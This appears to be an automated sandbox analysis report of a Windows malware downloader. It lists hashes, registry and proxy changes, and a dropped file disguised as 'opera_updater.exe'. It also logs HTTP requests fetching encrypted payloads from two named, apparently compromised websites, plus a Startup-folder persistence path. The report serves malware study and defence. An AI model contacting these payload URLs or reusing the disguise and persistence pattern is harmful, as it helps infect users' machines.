Analysis Date: 2015-05-23 18:10:15
MD5: 28e603d9ec6be4b215dc2d72df596101
SHA1: 710ec451db2a55322fab9bd1b7e1245ecdb78fcf

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: fc380bcebd472b6197d31e7cbbabc9cd  sha1: c09ac786b3ecd5b96dfcb2a4d728eab02b210dbd  size: 5632
Section .rdata md5: 0f858a083cde293bce96b9d1b2c5e32f  sha1: e78e789fbabf5f1f69b55f086f6663963c42eb8c  size: 1024
Section .data  md5: f9fb3ad05a6858eb50d1715a1565800f  sha1: c9b3a764a95ecb282f4a03d11bcdb94e3a168add  size: 1024
Section .rsrc  md5: 1ff8a510695e646dfbd20f00bb5a8bad  sha1: fdabbabbabce7abd4a43d4de4c1b4970994c90f0  size: 10240
Timestamp: 2014-02-04 13:30:20
PEhash: 6ff475e7481a5100f952679965b3807a16cca2e1
IMPhash: 683692d4746aa100a2b6043db7fe5945

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\wkssvc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: digitalitics.com
Winsock DNS: headstartcms.net

Network Details:

DNS: headstartcms.net (Type: A) ➝ 75.98.175.85
DNS: digitalitics.com (Type: A) ➝ 162.213.251.163
HTTP GET: http://headstartcms.net/driedmango.net/image/data/banner1/10UKp.enc
User-Agent: Updates downloader
HTTP GET: http://digitalitics.com/wp-content/uploads/2014/02/10UKp.enc
User-Agent: Updates downloader
HTTP GET: http://headstartcms.net/driedmango.net/image/data/banner1/10UKp.enc
User-Agent: Updates downloader
HTTP GET: http://digitalitics.com/wp-content/uploads/2014/02/10UKp.enc
User-Agent: Updates downloader
Flows TCP: 192.168.1.1:1031 ➝ 75.98.175.85:80
Flows TCP: 192.168.1.1:1032 ➝ 162.213.251.163:80
Flows TCP: 192.168.1.1:1033 ➝ 75.98.175.85:80
Flows TCP: 192.168.1.1:1034 ➝ 162.213.251.163:80

Raw Pcap

Strings
C:\Documents and Settings\All Users\Start Menu\Programs\Startup\w4760swjD.exe
Dial1
MS Sans Serif
Push to exit
/97B+Q
AWVAf9
CloseHandle
COMCTL32.dll
CreateFileW
@.data
DialogBoxIndirectParamW
EndDialog
GetDlgItem
GetFileSize
GetModuleHandleA
GetProcessHeap
G)NSW2Y
HeapAlloc
HeapFree
iRichu
KERNEL32.dll
KXG[O_
lstrcpyW
`.rdata
ReadFile
SendMessageW
!This program cannot be run in DOS mode.
USER32.dll
wsprintfW